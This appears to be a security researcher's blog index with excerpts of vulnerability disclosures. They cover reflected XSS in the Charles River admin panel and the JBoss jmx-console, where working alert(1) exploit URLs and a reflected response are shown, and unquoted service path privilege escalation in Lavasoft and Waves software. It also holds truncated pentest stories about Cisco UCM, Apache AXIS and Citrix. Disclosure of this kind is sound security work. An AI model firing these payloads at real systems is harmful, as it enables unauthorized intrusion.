Posts

Charles River Admin Panel Reflected Cross Site Scripting

Image
About Charles River: Charles River provides an executable for high profile people which helps them to make decision about investment. It has some automated algorithm which performs the calculation and analysis and help the user to take investment decision. This executable has an admin panel which is accessible through web browser. Vulnerability: The admin website of Charles River is vulnerable to post authentication cross site scripting vulnerability. The file configPopup.do has parameter "n" which is vulnerable to reflected cross site scripting. Exploit URL: domain.com:8081/crts/admin/failover/configPopup.do?n=beanEventPublisher%3cscript%3ealert(1)%3c%2fscript%3e Solution: Not yet rolled out Disclosure Timeline: August 2018: Informed to Charles River - No reply December 2018:Reminder mail sent through Contact Us - No reply January 1 2019: Full disclosure.

Unquoted service path vulnerability in WCAssistantService Lavasoft

Image
Vulnerability: Unquoted service path vulnerability in WCAssistantService Lavasoft Severity: High Impact: Any user that has Lavasoft webcompanion installed in their system can elevate his privilege on local system. Description: Web Companion blocks websites that try to steal your personal information by impersonating sites you know and trust. It keeps your passwords, payment and other personal information safe from hackers. Unquoted service path exists for the service "WCAssistantService". This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. How to check: C:\>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ WC Assistant                                                           WCAssistantService                                      C:\Program Files (x86)\Lavasoft\We

Unquoted service path local privilege escalation CVE 2017-6005

Image
Waves MaxxAudit when installed adds a windows service with the name "WavesSysSvc". This service has a vulnerability known as Unquoted Service Path. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. Version tested on:

Reflected XSS in jmx-console HtmlAdaptor DatabasePersistencePlugin parameter

Image
1) Description: Jmx-console's DatabasePersistencePlugin parameter in HtmlAdaptor is vulnerable to XSS /jmx-console/HtmlAdaptor?DatabasePersistencePlugin 2) Exploit: ##############Request#################### https://abc.com:8080/jmx-console/HtmlAdaptor?DatabasePersistencePlugin=org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin%22%3E%3Cscript%3Ealert%281%29%3C%2fscript%3E&name=jboss.ejb%3aservice%3dEJBTimerService%2cpersistencePolicy%3ddatabase&action=updateAttributes&DataSource=jboss.jca%3aservice%3dDataSourceBinding%2cname%3dDefaultDS ############Response##################### .............  <input type="text" name="DatabasePersistencePlugin" value="org.jboss.ejb.txtimer.GeneralPurposeDatabasePersistencePlugin"><script>alert(1)</script>" > ................ 3) Fixed version: Versions after 4.0.2 are fixed Note: Authenticated access to jmx-console is required to perform XSS

A short story of LFI and XSS on Cisco Unified Communications Manager Administrative Interface

Image
Cisco Unified Communications Manager Administrative Web Interface Directory Traversal Vulnerability   CVE-2013-5528 {Feels happy when your exploit gets published on exploit-db.com  https://www.exploit-db.com/exploits/40887/ } In one of the pentest engagement I got to play with Cisco Unified Communications Manager Administrative Web Interface 8.x.Well I was able to find LFI and XSS on one of the parameter. After few months I reported them to Cisco team. Few mail exchanges were done and Cisco team told me that the vulnerability is previously disclosed via CVE 2013-5528. The team says they have covered LFI and XSS by the same advisory. Any ways, I took the permission to publish the exploit from the team and here I am publishing a writeup. The vulnerability CVE 2013-5528: Directory traversal vulnerability exists on Cisco Unified Communications Manager Administrative Web Interface after authentication. The vulnerability is due to a failure to properly sanitize user-supplie

Apache AXIS server pentest

Image
              In one of my pentest engagement the scope was to test  a website abc.com/xyz/pqr.html and its mobile application. The website seems to be stronger and I was not able to find any vulnerability. So I switched to mobile application. When I was testing the mobile application, I was doing code analysis and found a URL in the code which was invoking a web service. The URL is as follows. https://abc.com/InstaWebServices/services/VersionCheck

Penetration testing of citrix server.

Image
" This was previously published at InfoSec Institute's Resources site." Here I'll discuss about how I did pentest of a citrix server in lab network. First let us understand about Windows terminal service. Windows Terminal Services (or Remote Desktop Services) is a feature of Windows 2003/2008 which allows multiple 'sessions' to be brokered to each enabled server, each running a server desktop or embedded application. Citrix is layered on top of Terminal Services (2003) or the RDS role (2008) and extend the functionality of this 'session based' access. Additional features such as ICA and it's HDX feature set which provide better application performance for interactive, graphical and WAN based applications, resource metric based load balancing, centralized administration, geographically dispersed 'terminal server farm' design options, application publishing (individual apps as opposed to an app embedded in a desktop